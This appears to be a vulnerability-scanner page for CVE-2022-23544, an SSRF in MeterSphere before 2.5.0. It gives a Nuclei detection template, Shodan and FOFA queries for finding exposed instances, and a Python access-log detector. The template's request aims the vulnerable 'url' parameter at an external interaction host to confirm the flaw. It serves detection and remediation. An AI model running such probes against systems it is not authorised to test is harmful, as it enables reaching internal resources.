MeterSphere < 2.5.0 SSRF
ID: CVE-2022-23544
Severity: medium
Author: j4vaovo
Tags: cve2022,cve,metersphere,ssrf,oast,xss
Description
MeterSphere is a one-stop open source continuous testing platform covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery (SSRF) that leads to Cross-Site Scripting (XSS). The SSRF in IssueProxyResourceService::getMdImageByUrl allows an attacker to access internal resources and, through a reflected XSS, to execute JavaScript code in the context of MeterSphere's origin when a victim triggers it. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
YAML Source
id: CVE-2022-23544

info:
  name: MeterSphere < 2.5.0 SSRF
  author: j4vaovo
  severity: medium
  description: |
    MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23544
    - https://github.com/metersphere/metersphere/security/advisories/GHSA-vrv6-cg45-rmjj
    - https://github.com/metersphere/metersphere/commit/d0f95b50737c941b29d507a4cc3545f2dc6ab121
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23544
    cwe-id: CWE-918,CWE-79
    epss-score: 0.00094
    epss-percentile: 0.3975
    cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
    vendor: metersphere
    product: metersphere
    shodan-query:
      - html:"metersphere"
      - http.html:"metersphere"
    fofa-query:
      - title="MeterSphere"
      - body="metersphere"
      - title="metersphere"
  tags: cve2022,cve,metersphere,ssrf,oast,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/resource/md/get/url?url=http://oast.pro"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Interactsh Server'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a004630440220088f02f1d5d63506b1b2d8297d413a764586d2041a3c5c36da28df9746a4304d0220269821afd89f1afa7ef519717caec5790b4abfc15e6ca68ae308a5231b7fba1c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-23544.yaml"
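
To look for past requests to the endpoint this template probes, the following added example (not part of the template or of the MeterSphere project) scans access-log text for `/resource/md/get/url` and labels where the `url` parameter pointed. The combined log format, the sample lines and the function names are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/resource/md/get/url"  # path requested by the template on this page

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Jan/2023:10:01:02 +0000] "GET /resource/md/get/url?url=http://oast.pro HTTP/1.1" 200 512
198.51.100.7 - - [12/Jan/2023:10:01:09 +0000] "GET /resource/md/get/url?url=http%3A%2F%2F10.0.0.5%3A8080%2Fstatus HTTP/1.1" 200 230
203.0.113.9 - - [12/Jan/2023:10:02:00 +0000] "GET /resource/md/get/url?url=http://localhost:8081/ HTTP/1.1" 500 0
203.0.113.9 - - [12/Jan/2023:10:03:00 +0000] "GET /login HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def classify_target(url):
    """Label where the server was asked to connect, without resolving DNS."""
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return "unparseable"
    if not host:
        return "unparseable"
    if host == "localhost" or host.endswith(".localhost"):
        return "internal"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external-name"  # a hostname; it may still resolve to an internal address
    internal = ip.is_private or ip.is_loopback or ip.is_link_local
    return "internal" if internal else "external-ip"


def find_probes(log_text):
    """Return (client, requested_url, target_class, status) for each hit on ENDPOINT."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if parts.path.rstrip("/") != ENDPOINT:
            continue
        for url in parse_qs(parts.query).get("url", []):  # parse_qs percent-decodes
            hits.append((client, url, classify_target(url), int(status)))
    return hits


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```

Any hit on a deployment older than 2.5.0 is worth reviewing; hits labelled `internal` show the server being pointed at its own network.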